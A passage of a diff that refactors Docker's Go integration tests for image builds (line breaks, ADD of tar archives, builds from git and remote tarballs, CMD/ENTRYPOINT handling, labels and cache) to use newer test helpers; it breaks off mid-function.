-3527,52 +2599,56 @@ dir1/dir3/** **/file?A **/file\?B **/dir5/file. -`, - }) - c.Assert(err, check.IsNil) - defer ctx.Close() +` - _, err = buildImageFromContext("noname", ctx, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, "noname", build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", dockerignore), + build.WithFile("dir1/file0", ""), + build.WithFile("dir1/dir2/file0", ""), + build.WithFile("file1", ""), + build.WithFile("dir1/file1", ""), + build.WithFile("dir1/dir2/file1", ""), + build.WithFile("dir1/file2", ""), + build.WithFile("dir1/dir2/file2", ""), // remains + build.WithFile("dir1/dir2/file4", ""), + build.WithFile("dir1/dir2/file5", ""), + build.WithFile("dir1/dir2/file6", ""), + build.WithFile("dir1/dir3/file7", ""), + build.WithFile("dir1/dir3/file8", ""), + build.WithFile("dir1/dir4/file9", ""), + build.WithFile("dir1/dir5/fileAA", ""), + build.WithFile("dir1/dir5/fileAB", ""), + build.WithFile("dir1/dir5/fileB", ""), + )) } func (s *DockerSuite) TestBuildLineBreak(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildlinebreak" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN sh -c 'echo root:testpass \ > /tmp/passwd' RUN mkdir -p /var/run/sshd RUN sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]" -RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`, - true) - if err != nil { - c.Fatal(err) - } +RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`)) } func (s *DockerSuite) TestBuildEOLInLine(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildeolinline" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN sh -c 'echo root:testpass > /tmp/passwd' RUN echo "foo \n bar"; echo "baz" RUN mkdir -p /var/run/sshd RUN sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]" -RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`, - true) - if err != nil { - c.Fatal(err) - } +RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`)) } func (s *DockerSuite) TestBuildCommentsShebangs(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildcomments" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox # This is an ordinary comment. RUN { echo '#!/bin/sh'; echo 'echo hello world'; } > /hello.sh RUN [ ! -x /hello.sh ] @@ -3580,18 +2656,13 @@ RUN [ ! -x /hello.sh ] RUN chmod +x /hello.sh RUN [ -x /hello.sh ] RUN [ "$(cat /hello.sh)" = $'#!/bin/sh\necho hello world' ] -RUN [ "$(/hello.sh)" = "hello world" ]`, - true) - if err != nil { - c.Fatal(err) - } +RUN [ "$(/hello.sh)" = "hello world" ]`)) } func (s *DockerSuite) TestBuildUsersAndGroups(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildusers" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox # Make sure our defaults work RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)" = '0:0/root:root' ] @@ -3640,13 +2711,10 @@ RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/do # make sure unknown uid/gid still works properly USER 1042:1043 -RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1042:1043/1042:1043/1043:1043' ]`, - true) - if err != nil { - c.Fatal(err) - } +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1042:1043/1042:1043/1043:1043' ]`)) } +// FIXME(vdemeester) rename this test (and probably "merge" it with the one below TestBuildEnvUsage2) func (s *DockerSuite) TestBuildEnvUsage(c *check.C) { // /docker/world/hello is not owned by the correct user testRequires(c, NotUserNamespace) @@ -3663,7 +2731,7 @@ ENV BAZ $BAR ENV FOOPATH $PATH:$FOO RUN [ "$BAR" = "$BAZ" ] RUN [ "$FOOPATH" = "$PATH:/foo/baz" ] -ENV FROM hello/docker/world +ENV FROM hello/docker/world ENV TO /docker/world/hello ADD $FROM $TO RUN [ "$(cat $TO)" = "hello" ] @@ -3671,20 +2739,13 @@ ENV abc=def ENV ghi=$abc RUN [ "$ghi" = "def" ] ` - ctx, err := fakeContext(dockerfile, map[string]string{ - "hello/docker/world": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("hello/docker/world", "hello"), + )) } +// FIXME(vdemeester) rename this test (and probably "merge" it with the one above TestBuildEnvUsage) func (s *DockerSuite) TestBuildEnvUsage2(c *check.C) { // /docker/world/hello is not owned by the correct user testRequires(c, NotUserNamespace) @@ -3748,18 +2809,10 @@ ENV eee4 'foo' RUN [ "$eee1,$eee2,$eee3,$eee4" = 'foo,foo,foo,foo' ] ` - ctx, err := fakeContext(dockerfile, map[string]string{ - "hello/docker/world": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("hello/docker/world", "hello"), + )) } func (s *DockerSuite) TestBuildAddScript(c *check.C) { @@ -3771,18 +2824,11 @@ ADD test /test RUN ["chmod","+x","/test"] RUN ["/test"] RUN [ "$(cat /testfile)" = 'test!' ]` - ctx, err := fakeContext(dockerfile, map[string]string{ - "test": "#!/bin/sh\necho 'test!' > /testfile", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("test", "#!/bin/sh\necho 'test!' > /testfile"), + )) } func (s *DockerSuite) TestBuildAddTar(c *check.C) { @@ -3790,7 +2836,7 @@ func (s *DockerSuite) TestBuildAddTar(c *check.C) { testRequires(c, NotUserNamespace) name := "testbuildaddtar" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD test.tar / @@ -3832,20 +2878,17 @@ RUN cat /existing-directory-trailing-slash/test/foo | grep Hi` if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed to complete for TestBuildAddTar: %v", err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } func (s *DockerSuite) TestBuildAddBrokenTar(c *check.C) { name := "testbuildaddbrokentar" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD test.tar /` @@ -3884,33 +2927,26 @@ ADD test.tar /` if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err == nil { - c.Fatalf("build should have failed for TestBuildAddBrokenTar") - } + buildImage(name, build.WithExternalBuildContext(ctx)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) } func (s *DockerSuite) TestBuildAddNonTar(c *check.C) { name := "testbuildaddnontar" // Should not try to extract test.tar - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox ADD test.tar / - RUN test -f /test.tar`, - map[string]string{"test.tar": "not_a_tar_file"}) - - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed for TestBuildAddNonTar") - } + RUN test -f /test.tar`), + build.WithFile("test.tar", "not_a_tar_file"), + )) } func (s *DockerSuite) TestBuildAddTarXz(c *check.C) { @@ -3919,7 +2955,7 @@ func (s *DockerSuite) TestBuildAddTarXz(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildaddtarxz" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD test.tar.xz / @@ -3947,32 +2983,26 @@ func (s *DockerSuite) TestBuildAddTarXz(c *check.C) { c.Fatalf("failed to close tar archive: %v", err) } - xzCompressCmd := exec.Command("xz", "-k", "test.tar") - xzCompressCmd.Dir = tmpDir - out, _, err := runCommandWithOutput(xzCompressCmd) - if err != nil { - c.Fatal(err, out) - } - + icmd.RunCmd(icmd.Cmd{ + Command: []string{"xz", "-k", "test.tar"}, + Dir: tmpDir, + }).Assert(c, icmd.Success) if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } func (s *DockerSuite) TestBuildAddTarXzGz(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildaddtarxzgz" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD test.tar.xz.gz / @@ -4000,52 +3030,40 @@ func (s *DockerSuite) TestBuildAddTarXzGz(c *check.C) { c.Fatalf("failed to close tar archive: %v", err) } - xzCompressCmd := exec.Command("xz", "-k", "test.tar") - xzCompressCmd.Dir = tmpDir - out, _, err := runCommandWithOutput(xzCompressCmd) - if err != nil { - c.Fatal(err, out) - } - - gzipCompressCmd := exec.Command("gzip", "test.tar.xz") - gzipCompressCmd.Dir = tmpDir - out, _, err = runCommandWithOutput(gzipCompressCmd) - if err != nil { - c.Fatal(err, out) - } + icmd.RunCmd(icmd.Cmd{ + Command: []string{"xz", "-k", "test.tar"}, + Dir: tmpDir, + }).Assert(c, icmd.Success) + icmd.RunCmd(icmd.Cmd{ + Command: []string{"gzip", "test.tar.xz"}, + Dir: tmpDir, + }) if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } +// FIXME(vdemeester) most of the from git tests could be moved to `docker/cli` e2e tests func (s *DockerSuite) TestBuildFromGit(c *check.C) { name := "testbuildfromgit" - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "Dockerfile": `FROM busybox - ADD first /first - RUN [ -f /first ] - MAINTAINER docker`, + ADD first /first + RUN [ -f /first ] + MAINTAINER docker`, "first": "test git data", }, true) - if err != nil { - c.Fatal(err) - } defer git.Close() - _, err = buildImageFromPath(name, git.RepoURL, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithContextPath(git.RepoURL)) + res := inspectField(c, name, "Author") if res != "docker" { c.Fatalf("Maintainer should be docker, got %s", res) @@ -4054,48 +3072,34 @@ func (s *DockerSuite) TestBuildFromGit(c *check.C) { func (s *DockerSuite) TestBuildFromGitWithContext(c *check.C) { name := "testbuildfromgit" - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "docker/Dockerfile": `FROM busybox ADD first /first RUN [ -f /first ] MAINTAINER docker`, "docker/first": "test git data", }, true) - if err != nil { - c.Fatal(err) - } defer git.Close() - u := fmt.Sprintf("%s#master:docker", git.RepoURL) - _, err = buildImageFromPath(name, u, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithContextPath(fmt.Sprintf("%s#master:docker", git.RepoURL))) + res := inspectField(c, name, "Author") if res != "docker" { c.Fatalf("Maintainer should be docker, got %s", res) } } -func (s *DockerSuite) TestBuildFromGitwithF(c *check.C) { +func (s *DockerSuite) TestBuildFromGitWithF(c *check.C) { name := "testbuildfromgitwithf" - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "myApp/myDockerfile": `FROM busybox RUN echo hi from Dockerfile`, }, true) - if err != nil { - c.Fatal(err) - } defer git.Close() - out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "myApp/myDockerfile", git.RepoURL) - if err != nil { - c.Fatalf("Error on build. Out: %s\nErr: %v", out, err) - } - - if !strings.Contains(out, "hi from Dockerfile") { - c.Fatalf("Missing expected output, got:\n%s", out) - } + buildImage(name, cli.WithFlags("-f", "myApp/myDockerfile"), build.WithContextPath(git.RepoURL)).Assert(c, icmd.Expected{ + Out: "hi from Dockerfile", + }) } func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) { @@ -4120,18 +3124,14 @@ func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) { c.Fatalf("failed to close tar archive: %v", err) } - server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{ "testT.tar": buffer, - }) - c.Assert(err, check.IsNil) - + })) defer server.Close() - _, err = buildImageFromPath(name, server.URL()+"/testT.tar", true) - c.Assert(err, check.IsNil) + cli.BuildCmd(c, name, build.WithContextPath(server.URL()+"/testT.tar")) res := inspectField(c, name, "Author") - if res != "docker" { c.Fatalf("Maintainer should be docker, got %s", res) } @@ -4139,24 +3139,17 @@ func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) { func (s *DockerSuite) TestBuildCleanupCmdOnEntrypoint(c *check.C) { name := "testbuildcmdcleanuponentrypoint" - if _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - CMD ["test"] - ENTRYPOINT ["echo"]`, - true); err != nil { - c.Fatal(err) - } - if _, err := buildImage(name, - fmt.Sprintf(`FROM %s - ENTRYPOINT ["cat"]`, name), - true); err != nil { - c.Fatal(err) - } + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + CMD ["test"] + ENTRYPOINT ["echo"]`)) + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM %s + ENTRYPOINT ["cat"]`, name))) + res := inspectField(c, name, "Config.Cmd") if res != "[]" { c.Fatalf("Cmd %s, expected nil", res) } - res = inspectField(c, name, "Config.Entrypoint") if expected := "[cat]"; res != expected { c.Fatalf("Entrypoint %s, expected %s", res, expected) @@ -4165,14 +3158,10 @@ func (s *DockerSuite) TestBuildCleanupCmdOnEntrypoint(c *check.C) { func (s *DockerSuite) TestBuildClearCmd(c *check.C) { name := "testbuildclearcmd" - _, err := buildImage(name, - `From `+minimalBaseImage()+` + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` ENTRYPOINT ["/bin/bash"] - CMD []`, - true) - if err != nil { - c.Fatal(err) - } + CMD []`)) + res := inspectFieldJSON(c, name, "Config.Cmd") if res != "[]" { c.Fatalf("Cmd %s, expected %s", res, "[]") @@ -4184,9 +3173,8 @@ func (s *DockerSuite) TestBuildEmptyCmd(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildemptycmd" - if _, err := buildImage(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM "+minimalBaseImage()+"\nMAINTAINER quux\n")) + res := inspectFieldJSON(c, name, "Config.Cmd") if res != "null" { c.Fatalf("Cmd %s, expected %s", res, "null") @@ -4195,43 +3183,31 @@ func (s *DockerSuite) TestBuildEmptyCmd(c *check.C) { func (s *DockerSuite) TestBuildOnBuildOutput(c *check.C) { name := "testbuildonbuildparent" - if _, err := buildImage(name, "FROM busybox\nONBUILD RUN echo foo\n", true); err != nil { - c.Fatal(err) - } - - _, out, err := buildImageWithOut(name, "FROM "+name+"\nMAINTAINER quux\n", true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nONBUILD RUN echo foo\n")) - if !strings.Contains(out, "# Executing 1 build trigger") { - c.Fatal("failed to find the build trigger output", out) - } + buildImage(name, build.WithDockerfile("FROM "+name+"\nMAINTAINER quux\n")).Assert(c, icmd.Expected{ + Out: "# Executing 1 build trigger", + }) } +// FIXME(vdemeester) should be a unit test func (s *DockerSuite) TestBuildInvalidTag(c *check.C) { - name := "abcd:" + stringutils.GenerateRandomAlphaOnlyString(200) - _, out, err := buildImageWithOut(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true) - // if the error doesn't check for illegal tag name, or the image is built - // then this should fail - if !strings.Contains(out, "Error parsing reference") || strings.Contains(out, "Sending build context to Docker daemon") { - c.Fatalf("failed to stop before building. Error: %s, Output: %s", err, out) - } + name := "abcd:" + testutil.GenerateRandomAlphaOnlyString(200) + buildImage(name, build.WithDockerfile("FROM "+minimalBaseImage()+"\nMAINTAINER quux\n")).Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "invalid reference format", + }) } func (s *DockerSuite) TestBuildCmdShDashC(c *check.C) { name := "testbuildcmdshc" - if _, err := buildImage(name, "FROM busybox\nCMD echo cmd\n", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD echo cmd\n")) res := inspectFieldJSON(c, name, "Config.Cmd") - expected := `["/bin/sh","-c","echo cmd"]` - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = `["cmd","/S","/C","echo cmd"]` } - if res != expected { c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res) } @@ -4243,124 +3219,86 @@ func (s *DockerSuite) TestBuildCmdSpaces(c *check.C) { // the arg separator to make sure ["echo","hi"] and ["echo hi"] don't // look the same name := "testbuildcmdspaces" - var id1 string - var id2 string - var err error - if id1, err = buildImage(name, "FROM busybox\nCMD [\"echo hi\"]\n", true); err != nil { - c.Fatal(err) - } - - if id2, err = buildImage(name, "FROM busybox\nCMD [\"echo\", \"hi\"]\n", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD [\"echo hi\"]\n")) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD [\"echo\", \"hi\"]\n")) + id2 := getIDByName(c, name) if id1 == id2 { c.Fatal("Should not have resulted in the same CMD") } // Now do the same with ENTRYPOINT - if id1, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo hi\"]\n", true); err != nil { - c.Fatal(err) - } - - if id2, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo\", \"hi\"]\n", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENTRYPOINT [\"echo hi\"]\n")) + id1 = getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENTRYPOINT [\"echo\", \"hi\"]\n")) + id2 = getIDByName(c, name) if id1 == id2 { c.Fatal("Should not have resulted in the same ENTRYPOINT") } - } func (s *DockerSuite) TestBuildCmdJSONNoShDashC(c *check.C) { name := "testbuildcmdjson" - if _, err := buildImage(name, "FROM busybox\nCMD [\"echo\", \"cmd\"]", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD [\"echo\", \"cmd\"]")) res := inspectFieldJSON(c, name, "Config.Cmd") - expected := `["echo","cmd"]` - if res != expected { c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res) } - } -func (s *DockerSuite) TestBuildEntrypointInheritance(c *check.C) { - - if _, err := buildImage("parent", ` +func (s *DockerSuite) TestBuildEntrypointCanBeOverriddenByChild(c *check.C) { + buildImageSuccessfully(c, "parent", build.WithDockerfile(` FROM busybox ENTRYPOINT exit 130 - `, true); err != nil { - c.Fatal(err) - } + `)) - if _, status, _ := dockerCmdWithError("run", "parent"); status != 130 { - c.Fatalf("expected exit code 130 but received %d", status) - } + icmd.RunCommand(dockerBinary, "run", "parent").Assert(c, icmd.Expected{ + ExitCode: 130, + }) - if _, err := buildImage("child", ` + buildImageSuccessfully(c, "child", build.WithDockerfile(` FROM parent ENTRYPOINT exit 5 - `, true); err != nil { - c.Fatal(err) - } - - if _, status, _ := dockerCmdWithError("run", "child"); status != 5 { - c.Fatalf("expected exit code 5 but received %d", status) - } + `)) + icmd.RunCommand(dockerBinary, "run", "child").Assert(c, icmd.Expected{ + ExitCode: 5, + }) } -func (s *DockerSuite) TestBuildEntrypointInheritanceInspect(c *check.C) { +func (s *DockerSuite) TestBuildEntrypointCanBeOverriddenByChildInspect(c *check.C) { var ( name = "testbuildepinherit" name2 = "testbuildepinherit2" expected = `["/bin/sh","-c","echo quux"]` ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = `["cmd","/S","/C","echo quux"]` } - if _, err := buildImage(name, "FROM busybox\nENTRYPOINT /foo/bar", true); err != nil { - c.Fatal(err) - } - - if _, err := buildImage(name2, fmt.Sprintf("FROM %s\nENTRYPOINT echo quux", name), true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENTRYPOINT /foo/bar")) + buildImageSuccessfully(c, name2, build.WithDockerfile(fmt.Sprintf("FROM %s\nENTRYPOINT echo quux", name))) res := inspectFieldJSON(c, name2, "Config.Entrypoint") - if res != expected { c.Fatalf("Expected value %s not in Config.Entrypoint: %s", expected, res) } - out, _ := dockerCmd(c, "run", name2) - - expected = "quux" - - if strings.TrimSpace(out) != expected { - c.Fatalf("Expected output is %s, got %s", expected, out) - } - + icmd.RunCommand(dockerBinary, "run", name2).Assert(c, icmd.Expected{ + Out: "quux", + }) } func (s *DockerSuite) TestBuildRunShEntrypoint(c *check.C) { name := "testbuildentrypoint" - _, err := buildImage(name, - `FROM busybox - ENTRYPOINT echo`, - true) - if err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + ENTRYPOINT echo`)) dockerCmd(c, "run", "--rm", name) } @@ -4368,7 +3306,7 @@ func (s *DockerSuite) TestBuildExoticShellInterpolation(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildexoticshellinterpolation" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV SOME_VAR a.b.c @@ -4386,11 +3324,7 @@ func (s *DockerSuite) TestBuildExoticShellInterpolation(c *check.C) { RUN [ "${SOME_VAR:+Version: ${SOME_VAR}}" = 'Version: a.b.c' ] RUN [ "${SOME_UNSET_VAR:+${SOME_VAR}}" = '' ] RUN [ "${SOME_UNSET_VAR:-${SOME_VAR:-d.e.f}}" = 'a.b.c' ] - `, false) - if err != nil { - c.Fatal(err) - } - + `)) } func (s *DockerSuite) TestBuildVerifySingleQuoteFails(c *check.C) { @@ -4400,53 +3334,40 @@ func (s *DockerSuite) TestBuildVerifySingleQuoteFails(c *check.C) { // as a "string" instead of "JSON array" and pass it on to "sh -c" and // it should barf on it. name := "testbuildsinglequotefails" - - if _, err := buildImage(name, - `FROM busybox - CMD [ '/bin/sh', '-c', 'echo hi' ]`, - true); err != nil { - c.Fatal(err) + expectedExitCode := 2 + if testEnv.OSType == "windows" { + expectedExitCode = 127 } - if _, _, err := dockerCmdWithError("run", "--rm", name); err == nil { - c.Fatal("The image was not supposed to be able to run") - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + CMD [ '/bin/sh', '-c', 'echo hi' ]`)) + icmd.RunCommand(dockerBinary, "run", "--rm", name).Assert(c, icmd.Expected{ + ExitCode: expectedExitCode, + }) } func (s *DockerSuite) TestBuildVerboseOut(c *check.C) { name := "testbuildverboseout" expected := "\n123\n" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = "\n123\r\n" } - _, out, err := buildImageWithOut(name, - `FROM busybox -RUN echo 123`, - false) - - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, expected) { - c.Fatalf("Output should contain %q: %q", "123", out) - } - + buildImage(name, build.WithDockerfile(`FROM busybox +RUN echo 123`)).Assert(c, icmd.Expected{ + Out: expected, + }) } func (s *DockerSuite) TestBuildWithTabs(c *check.C) { name := "testbuildwithtabs" - _, err := buildImage(name, - "FROM busybox\nRUN echo\tone\t\ttwo", true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nRUN echo\tone\t\ttwo")) res := inspectFieldJSON(c, name, "ContainerConfig.Cmd") expected1 := `["/bin/sh","-c","echo\tone\t\ttwo"]` expected2 := `["/bin/sh","-c","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected1 = `["cmd","/S","/C","echo\tone\t\ttwo"]` expected2 = `["cmd","/S","/C","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates } @@ -4458,14 +3379,9 @@ func (s *DockerSuite) TestBuildWithTabs(c *check.C) { func (s *DockerSuite) TestBuildLabels(c *check.C) { name := "testbuildlabel" expected := `{"License":"GPL","Vendor":"Acme"}` - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox LABEL Vendor=Acme - LABEL License GPL`, - true) - if err != nil { - c.Fatal(err) - } + LABEL License GPL`)) res := inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -4475,221 +3391,214 @@ func (s *DockerSuite) TestBuildLabels(c *check.C) { func (s *DockerSuite) TestBuildLabelsCache(c *check.C) { name := "testbuildlabelcache" - id1, err := buildImage(name, - `FROM busybox - LABEL Vendor=Acme`, false) - if err != nil { - c.Fatalf("Build 1 should have worked: %v", err) - } - - id2, err := buildImage(name, - `FROM busybox - LABEL Vendor=Acme`, true) - if err != nil || id1 != id2 { - c.Fatalf("Build 2 should have worked & used cache(%s,%s): %v", id1, id2, err) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL Vendor=Acme`)) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL Vendor=Acme`)) + id2 := getIDByName(c, name) + if id1 != id2 { + c.Fatalf("Build 2 should have worked & used cache(%s,%s)", id1, id2) } - id2, err = buildImage(name, - `FROM busybox - LABEL Vendor=Acme1`, true) - if err != nil || id1 == id2 { - c.Fatalf("Build 3 should have worked & NOT used cache(%s,%s): %v", id1, id2, err) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL Vendor=Acme1`)) + id2 = getIDByName(c, name) + if id1 == id2 { + c.Fatalf("Build 3 should have worked & NOT used cache(%s,%s)", id1, id2) } - id2, err = buildImage(name, - `FROM busybox - LABEL Vendor Acme`, true) // Note: " " and "=" should be same - if err != nil || id1 != id2 { - c.Fatalf("Build 4 should have worked & used cache(%s,%s): %v", id1, id2, err) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL Vendor Acme`)) + id2 = getIDByName(c, name) + if id1 != id2 { + c.Fatalf("Build 4 should have worked & used cache(%s,%s)", id1, id2) } // Now make sure the cache isn't used by mistake - id1, err = buildImage(name, - `FROM busybox - LABEL f1=b1 f2=b2`, false) - if err != nil { - c.Fatalf("Build 5 should have worked: %q", err) - } + buildImageSuccessfully(c, name, build.WithoutCache, build.WithDockerfile(`FROM busybox + LABEL f1=b1 f2=b2`)) - id2, err = buildImage(name, - `FROM busybox - LABEL f1="b1 f2=b2"`, true) - if err != nil || id1 == id2 { - c.Fatalf("Build 6 should have worked & NOT used the cache(%s,%s): %q", id1, id2, err) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL f1=b1 f2=b2`)) + id2 = getIDByName(c, name) + if id1 == id2 { + c.Fatalf("Build 6 should have worked & NOT used the cache(%s,%s)", id1, id2) } } +// FIXME(vdemeester) port to docker/cli e2e tests (api tests should test suppressOutput option though) func (s *DockerSuite) TestBuildNotVerboseSuccess(c *check.C) { // This test makes sure that -q works correctly when build is successful: // stdout has only the image ID (long image ID) and stderr is empty. - var stdout, stderr string - var err error outRegexp := regexp.MustCompile("^(sha256:|)[a-z0-9]{64}\\n$") + buildFlags := cli.WithFlags("-q") tt := []struct { Name string - BuildFunc func(string) + BuildFunc func(string) *icmd.Result }{ { Name: "quiet_build_stdin_success", - BuildFunc: func(name string) { - _, stdout, stderr, err = buildImageWithStdoutStderr(name, "FROM busybox", true, "-q", "--force-rm", "--rm") + BuildFunc: func(name string) *icmd.Result { + return buildImage(name, buildFlags, build.WithDockerfile("FROM busybox")) }, }, { Name: "quiet_build_ctx_success", - BuildFunc: func(name string) { - ctx, err := fakeContext("FROM busybox", map[string]string{ - "quiet_build_success_fctx": "test", - }) - if err != nil { - c.Fatalf("Failed to create context: %s", err.Error()) - } - defer ctx.Close() - _, stdout, stderr, err = buildImageFromContextWithStdoutStderr(name, 